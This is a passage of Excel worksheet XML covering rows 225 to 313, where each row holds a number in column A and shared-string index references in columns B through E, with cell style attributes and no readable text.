      <c r="A225" s="106">
        <v>2525.0</v>
      </c>
      <c r="B225" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C225" s="108" t="s">
        <v>1234</v>
      </c>
      <c r="D225" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E225" s="110" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="101">
        <v>2538.0</v>
      </c>
      <c r="B226" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C226" s="103" t="s">
        <v>1236</v>
      </c>
      <c r="D226" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E226" s="105" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="106">
        <v>2643.0</v>
      </c>
      <c r="B227" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C227" s="108" t="s">
        <v>1243</v>
      </c>
      <c r="D227" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E227" s="110" t="s">
        <v>3378</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="101">
        <v>2650.0</v>
      </c>
      <c r="B228" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C228" s="103" t="s">
        <v>1246</v>
      </c>
      <c r="D228" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E228" s="105" t="s">
        <v>3379</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="106">
        <v>2710.0</v>
      </c>
      <c r="B229" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C229" s="108" t="s">
        <v>1249</v>
      </c>
      <c r="D229" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E229" s="110" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="101">
        <v>2943.0</v>
      </c>
      <c r="B230" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C230" s="103" t="s">
        <v>1261</v>
      </c>
      <c r="D230" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E230" s="105" t="s">
        <v>3381</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="106">
        <v>3274.0</v>
      </c>
      <c r="B231" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C231" s="108" t="s">
        <v>1271</v>
      </c>
      <c r="D231" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E231" s="110" t="s">
        <v>3382</v>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="101">
        <v>3420.0</v>
      </c>
      <c r="B232" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C232" s="103" t="s">
        <v>1281</v>
      </c>
      <c r="D232" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E232" s="105" t="s">
        <v>3383</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="106">
        <v>5251.0</v>
      </c>
      <c r="B233" s="107" t="s">
        <v>44</v>
      </c>
      <c r="C233" s="108" t="s">
        <v>1284</v>
      </c>
      <c r="D233" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E233" s="110" t="s">
        <v>3384</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="101">
        <v>5273.0</v>
      </c>
      <c r="B234" s="102" t="s">
        <v>44</v>
      </c>
      <c r="C234" s="103" t="s">
        <v>1287</v>
      </c>
      <c r="D234" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E234" s="105" t="s">
        <v>3385</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="106">
        <v>182.0</v>
      </c>
      <c r="B235" s="107" t="s">
        <v>46</v>
      </c>
      <c r="C235" s="108" t="s">
        <v>1290</v>
      </c>
      <c r="D235" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E235" s="110" t="s">
        <v>3386</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="101">
        <v>429.0</v>
      </c>
      <c r="B236" s="102" t="s">
        <v>46</v>
      </c>
      <c r="C236" s="103" t="s">
        <v>1293</v>
      </c>
      <c r="D236" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E236" s="105" t="s">
        <v>3387</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="106">
        <v>462.0</v>
      </c>
      <c r="B237" s="107" t="s">
        <v>46</v>
      </c>
      <c r="C237" s="108" t="s">
        <v>1296</v>
      </c>
      <c r="D237" s="109" t="s">
        <v>3032</v>
      </c>
      <c r="E237" s="110" t="s">
        <v>3388</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="101">
        <v>37.0</v>
      </c>
      <c r="B238" s="102" t="s">
        <v>48</v>
      </c>
      <c r="C238" s="103" t="s">
        <v>1299</v>
      </c>
      <c r="D238" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E238" s="105" t="s">
        <v>3389</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="106">
        <v>65.0</v>
      </c>
      <c r="B239" s="107" t="s">
        <v>48</v>
      </c>
      <c r="C239" s="108" t="s">
        <v>1302</v>
      </c>
      <c r="D239" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E239" s="110" t="s">
        <v>3390</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="101">
        <v>77.0</v>
      </c>
      <c r="B240" s="102" t="s">
        <v>48</v>
      </c>
      <c r="C240" s="103" t="s">
        <v>1305</v>
      </c>
      <c r="D240" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E240" s="105" t="s">
        <v>3391</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="106">
        <v>118.0</v>
      </c>
      <c r="B241" s="107" t="s">
        <v>48</v>
      </c>
      <c r="C241" s="108" t="s">
        <v>1308</v>
      </c>
      <c r="D241" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E241" s="110" t="s">
        <v>3392</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="101">
        <v>341.0</v>
      </c>
      <c r="B242" s="102" t="s">
        <v>48</v>
      </c>
      <c r="C242" s="103" t="s">
        <v>1311</v>
      </c>
      <c r="D242" s="104" t="s">
        <v>3046</v>
      </c>
      <c r="E242" s="105" t="s">
        <v>3393</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="106">
        <v>475.0</v>
      </c>
      <c r="B243" s="107" t="s">
        <v>48</v>
      </c>
      <c r="C243" s="108" t="s">
        <v>1314</v>
      </c>
      <c r="D243" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E243" s="110" t="s">
        <v>3394</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="101">
        <v>3033.0</v>
      </c>
      <c r="B244" s="102" t="s">
        <v>50</v>
      </c>
      <c r="C244" s="103" t="s">
        <v>1317</v>
      </c>
      <c r="D244" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E244" s="105" t="s">
        <v>3395</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="106">
        <v>3649.0</v>
      </c>
      <c r="B245" s="107" t="s">
        <v>50</v>
      </c>
      <c r="C245" s="108" t="s">
        <v>1323</v>
      </c>
      <c r="D245" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E245" s="110" t="s">
        <v>3396</v>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="101">
        <v>461.0</v>
      </c>
      <c r="B246" s="102" t="s">
        <v>52</v>
      </c>
      <c r="C246" s="103" t="s">
        <v>1326</v>
      </c>
      <c r="D246" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E246" s="105" t="s">
        <v>3397</v>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="106">
        <v>1777.0</v>
      </c>
      <c r="B247" s="107" t="s">
        <v>52</v>
      </c>
      <c r="C247" s="108" t="s">
        <v>1329</v>
      </c>
      <c r="D247" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E247" s="110" t="s">
        <v>3398</v>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="101">
        <v>18.0</v>
      </c>
      <c r="B248" s="102" t="s">
        <v>55</v>
      </c>
      <c r="C248" s="103" t="s">
        <v>1332</v>
      </c>
      <c r="D248" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E248" s="105" t="s">
        <v>3399</v>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="106">
        <v>27288.0</v>
      </c>
      <c r="B249" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C249" s="108" t="s">
        <v>1339</v>
      </c>
      <c r="D249" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E249" s="110" t="s">
        <v>3400</v>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="101">
        <v>27305.0</v>
      </c>
      <c r="B250" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C250" s="103" t="s">
        <v>1342</v>
      </c>
      <c r="D250" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E250" s="105" t="s">
        <v>3401</v>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="106">
        <v>28003.0</v>
      </c>
      <c r="B251" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C251" s="108" t="s">
        <v>1345</v>
      </c>
      <c r="D251" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E251" s="110" t="s">
        <v>3402</v>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="101">
        <v>28233.0</v>
      </c>
      <c r="B252" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C252" s="103" t="s">
        <v>1348</v>
      </c>
      <c r="D252" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E252" s="105" t="s">
        <v>3403</v>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="106">
        <v>28381.0</v>
      </c>
      <c r="B253" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C253" s="108" t="s">
        <v>1354</v>
      </c>
      <c r="D253" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E253" s="110" t="s">
        <v>3404</v>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="101">
        <v>28539.0</v>
      </c>
      <c r="B254" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C254" s="103" t="s">
        <v>1360</v>
      </c>
      <c r="D254" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E254" s="105" t="s">
        <v>3405</v>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="106">
        <v>29071.0</v>
      </c>
      <c r="B255" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C255" s="108" t="s">
        <v>1363</v>
      </c>
      <c r="D255" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E255" s="110" t="s">
        <v>3406</v>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="101">
        <v>29127.0</v>
      </c>
      <c r="B256" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C256" s="103" t="s">
        <v>1366</v>
      </c>
      <c r="D256" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E256" s="105" t="s">
        <v>3407</v>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="106">
        <v>30039.0</v>
      </c>
      <c r="B257" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C257" s="108" t="s">
        <v>1369</v>
      </c>
      <c r="D257" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E257" s="110" t="s">
        <v>3408</v>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="101">
        <v>30103.0</v>
      </c>
      <c r="B258" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C258" s="103" t="s">
        <v>1372</v>
      </c>
      <c r="D258" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E258" s="105" t="s">
        <v>3409</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="106">
        <v>30860.0</v>
      </c>
      <c r="B259" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C259" s="108" t="s">
        <v>1381</v>
      </c>
      <c r="D259" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E259" s="110" t="s">
        <v>3410</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="101">
        <v>31091.0</v>
      </c>
      <c r="B260" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C260" s="103" t="s">
        <v>1384</v>
      </c>
      <c r="D260" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E260" s="105" t="s">
        <v>3411</v>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="106">
        <v>32540.0</v>
      </c>
      <c r="B261" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C261" s="108" t="s">
        <v>1387</v>
      </c>
      <c r="D261" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E261" s="110" t="s">
        <v>3412</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="101">
        <v>33109.0</v>
      </c>
      <c r="B262" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C262" s="103" t="s">
        <v>1390</v>
      </c>
      <c r="D262" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E262" s="105" t="s">
        <v>3413</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="106">
        <v>33357.0</v>
      </c>
      <c r="B263" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C263" s="108" t="s">
        <v>1393</v>
      </c>
      <c r="D263" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E263" s="110" t="s">
        <v>3414</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="101">
        <v>33742.0</v>
      </c>
      <c r="B264" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C264" s="103" t="s">
        <v>1396</v>
      </c>
      <c r="D264" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E264" s="105" t="s">
        <v>3415</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="106">
        <v>1197.0</v>
      </c>
      <c r="B265" s="107" t="s">
        <v>60</v>
      </c>
      <c r="C265" s="108" t="s">
        <v>1402</v>
      </c>
      <c r="D265" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E265" s="110" t="s">
        <v>3416</v>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="101">
        <v>2043.0</v>
      </c>
      <c r="B266" s="102" t="s">
        <v>60</v>
      </c>
      <c r="C266" s="103" t="s">
        <v>1405</v>
      </c>
      <c r="D266" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E266" s="105" t="s">
        <v>3417</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="106">
        <v>2424.0</v>
      </c>
      <c r="B267" s="107" t="s">
        <v>60</v>
      </c>
      <c r="C267" s="108" t="s">
        <v>1408</v>
      </c>
      <c r="D267" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E267" s="110" t="s">
        <v>3418</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="101">
        <v>2432.0</v>
      </c>
      <c r="B268" s="102" t="s">
        <v>60</v>
      </c>
      <c r="C268" s="103" t="s">
        <v>1411</v>
      </c>
      <c r="D268" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E268" s="105" t="s">
        <v>3419</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="106">
        <v>2464.0</v>
      </c>
      <c r="B269" s="107" t="s">
        <v>60</v>
      </c>
      <c r="C269" s="108" t="s">
        <v>1414</v>
      </c>
      <c r="D269" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E269" s="110" t="s">
        <v>3420</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="101">
        <v>40.0</v>
      </c>
      <c r="B270" s="102" t="s">
        <v>62</v>
      </c>
      <c r="C270" s="103" t="s">
        <v>1417</v>
      </c>
      <c r="D270" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E270" s="105" t="s">
        <v>3421</v>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="106">
        <v>241.0</v>
      </c>
      <c r="B271" s="107" t="s">
        <v>65</v>
      </c>
      <c r="C271" s="108" t="s">
        <v>1423</v>
      </c>
      <c r="D271" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E271" s="110" t="s">
        <v>3422</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="101">
        <v>574.0</v>
      </c>
      <c r="B272" s="102" t="s">
        <v>65</v>
      </c>
      <c r="C272" s="103" t="s">
        <v>1426</v>
      </c>
      <c r="D272" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E272" s="105" t="s">
        <v>3423</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="106">
        <v>18363.0</v>
      </c>
      <c r="B273" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C273" s="108" t="s">
        <v>1432</v>
      </c>
      <c r="D273" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E273" s="110" t="s">
        <v>3424</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="101">
        <v>18368.0</v>
      </c>
      <c r="B274" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C274" s="103" t="s">
        <v>1435</v>
      </c>
      <c r="D274" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E274" s="105" t="s">
        <v>3425</v>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="106">
        <v>18447.0</v>
      </c>
      <c r="B275" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C275" s="108" t="s">
        <v>1441</v>
      </c>
      <c r="D275" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E275" s="110" t="s">
        <v>3426</v>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="101">
        <v>18585.0</v>
      </c>
      <c r="B276" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C276" s="103" t="s">
        <v>1446</v>
      </c>
      <c r="D276" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E276" s="105" t="s">
        <v>3427</v>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="106">
        <v>18669.0</v>
      </c>
      <c r="B277" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C277" s="108" t="s">
        <v>1452</v>
      </c>
      <c r="D277" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E277" s="110" t="s">
        <v>3428</v>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="101">
        <v>18845.0</v>
      </c>
      <c r="B278" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C278" s="103" t="s">
        <v>1464</v>
      </c>
      <c r="D278" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E278" s="105" t="s">
        <v>3429</v>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="106">
        <v>18872.0</v>
      </c>
      <c r="B279" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C279" s="108" t="s">
        <v>1467</v>
      </c>
      <c r="D279" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E279" s="110" t="s">
        <v>3430</v>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="101">
        <v>18887.0</v>
      </c>
      <c r="B280" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C280" s="103" t="s">
        <v>1473</v>
      </c>
      <c r="D280" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E280" s="105" t="s">
        <v>3431</v>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="106">
        <v>18991.0</v>
      </c>
      <c r="B281" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C281" s="108" t="s">
        <v>1479</v>
      </c>
      <c r="D281" s="109" t="s">
        <v>3032</v>
      </c>
      <c r="E281" s="110" t="s">
        <v>3432</v>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="101">
        <v>11.0</v>
      </c>
      <c r="B282" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C282" s="103" t="s">
        <v>1503</v>
      </c>
      <c r="D282" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E282" s="105" t="s">
        <v>3433</v>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="106">
        <v>24.0</v>
      </c>
      <c r="B283" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C283" s="108" t="s">
        <v>1509</v>
      </c>
      <c r="D283" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E283" s="110" t="s">
        <v>3434</v>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="101">
        <v>33.0</v>
      </c>
      <c r="B284" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C284" s="103" t="s">
        <v>1512</v>
      </c>
      <c r="D284" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E284" s="105" t="s">
        <v>3435</v>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="106">
        <v>40.0</v>
      </c>
      <c r="B285" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C285" s="108" t="s">
        <v>1515</v>
      </c>
      <c r="D285" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E285" s="110" t="s">
        <v>3436</v>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="101">
        <v>65.0</v>
      </c>
      <c r="B286" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C286" s="103" t="s">
        <v>1518</v>
      </c>
      <c r="D286" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E286" s="105" t="s">
        <v>3437</v>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="106">
        <v>238.0</v>
      </c>
      <c r="B287" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C287" s="108" t="s">
        <v>1524</v>
      </c>
      <c r="D287" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E287" s="110" t="s">
        <v>3438</v>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="101">
        <v>241.0</v>
      </c>
      <c r="B288" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C288" s="103" t="s">
        <v>1527</v>
      </c>
      <c r="D288" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E288" s="105" t="s">
        <v>3439</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="106">
        <v>288.0</v>
      </c>
      <c r="B289" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C289" s="108" t="s">
        <v>1533</v>
      </c>
      <c r="D289" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E289" s="110" t="s">
        <v>3440</v>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="101">
        <v>290.0</v>
      </c>
      <c r="B290" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C290" s="103" t="s">
        <v>1536</v>
      </c>
      <c r="D290" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E290" s="105" t="s">
        <v>3441</v>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="106">
        <v>297.0</v>
      </c>
      <c r="B291" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C291" s="108" t="s">
        <v>1544</v>
      </c>
      <c r="D291" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E291" s="110" t="s">
        <v>3442</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="101">
        <v>315.0</v>
      </c>
      <c r="B292" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C292" s="103" t="s">
        <v>1547</v>
      </c>
      <c r="D292" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E292" s="105" t="s">
        <v>3443</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="106">
        <v>348.0</v>
      </c>
      <c r="B293" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C293" s="108" t="s">
        <v>1553</v>
      </c>
      <c r="D293" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E293" s="110" t="s">
        <v>3444</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="101">
        <v>388.0</v>
      </c>
      <c r="B294" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C294" s="103" t="s">
        <v>1556</v>
      </c>
      <c r="D294" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E294" s="105" t="s">
        <v>3445</v>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="106">
        <v>400.0</v>
      </c>
      <c r="B295" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C295" s="108" t="s">
        <v>1559</v>
      </c>
      <c r="D295" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E295" s="110" t="s">
        <v>3446</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="101">
        <v>410.0</v>
      </c>
      <c r="B296" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C296" s="103" t="s">
        <v>1562</v>
      </c>
      <c r="D296" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E296" s="105" t="s">
        <v>3447</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="106">
        <v>515.0</v>
      </c>
      <c r="B297" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C297" s="108" t="s">
        <v>1565</v>
      </c>
      <c r="D297" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E297" s="110" t="s">
        <v>3448</v>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="101">
        <v>641.0</v>
      </c>
      <c r="B298" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C298" s="103" t="s">
        <v>1568</v>
      </c>
      <c r="D298" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E298" s="105" t="s">
        <v>3449</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="106">
        <v>652.0</v>
      </c>
      <c r="B299" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C299" s="108" t="s">
        <v>1576</v>
      </c>
      <c r="D299" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E299" s="110" t="s">
        <v>3450</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="101">
        <v>725.0</v>
      </c>
      <c r="B300" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C300" s="103" t="s">
        <v>1579</v>
      </c>
      <c r="D300" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E300" s="105" t="s">
        <v>3451</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="106">
        <v>856.0</v>
      </c>
      <c r="B301" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C301" s="108" t="s">
        <v>1585</v>
      </c>
      <c r="D301" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E301" s="110" t="s">
        <v>3452</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="101">
        <v>880.0</v>
      </c>
      <c r="B302" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C302" s="103" t="s">
        <v>1588</v>
      </c>
      <c r="D302" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E302" s="105" t="s">
        <v>3453</v>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="106">
        <v>985.0</v>
      </c>
      <c r="B303" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C303" s="108" t="s">
        <v>1594</v>
      </c>
      <c r="D303" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E303" s="110" t="s">
        <v>3454</v>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="101">
        <v>1129.0</v>
      </c>
      <c r="B304" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C304" s="103" t="s">
        <v>1597</v>
      </c>
      <c r="D304" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E304" s="105" t="s">
        <v>3455</v>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="106">
        <v>1638.0</v>
      </c>
      <c r="B305" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C305" s="108" t="s">
        <v>1603</v>
      </c>
      <c r="D305" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E305" s="110" t="s">
        <v>3456</v>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="101">
        <v>1662.0</v>
      </c>
      <c r="B306" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C306" s="103" t="s">
        <v>1606</v>
      </c>
      <c r="D306" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E306" s="105" t="s">
        <v>3457</v>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="106">
        <v>1693.0</v>
      </c>
      <c r="B307" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C307" s="108" t="s">
        <v>1609</v>
      </c>
      <c r="D307" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E307" s="110" t="s">
        <v>3458</v>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="101">
        <v>1713.0</v>
      </c>
      <c r="B308" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C308" s="103" t="s">
        <v>1615</v>
      </c>
      <c r="D308" s="104" t="s">
        <v>3042</v>
      </c>
      <c r="E308" s="105" t="s">
        <v>3459</v>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="106">
        <v>1722.0</v>
      </c>
      <c r="B309" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C309" s="108" t="s">
        <v>1618</v>
      </c>
      <c r="D309" s="109" t="s">
        <v>3008</v>
      </c>
      <c r="E309" s="110" t="s">
        <v>3460</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="101">
        <v>1756.0</v>
      </c>
      <c r="B310" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C310" s="103" t="s">
        <v>1621</v>
      </c>
      <c r="D310" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E310" s="105" t="s">
        <v>3461</v>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="106">
        <v>1866.0</v>
      </c>
      <c r="B311" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C311" s="108" t="s">
        <v>1624</v>
      </c>
      <c r="D311" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E311" s="110" t="s">
        <v>3462</v>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="101">
        <v>1981.0</v>
      </c>
      <c r="B312" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C312" s="103" t="s">
        <v>1627</v>
      </c>
      <c r="D312" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E312" s="105" t="s">
        <v>3463</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="106">
        <v>2014.0</v>
      </c>
      <c r="B313" s="107" t="s">
        <v>69</v>
      </c>
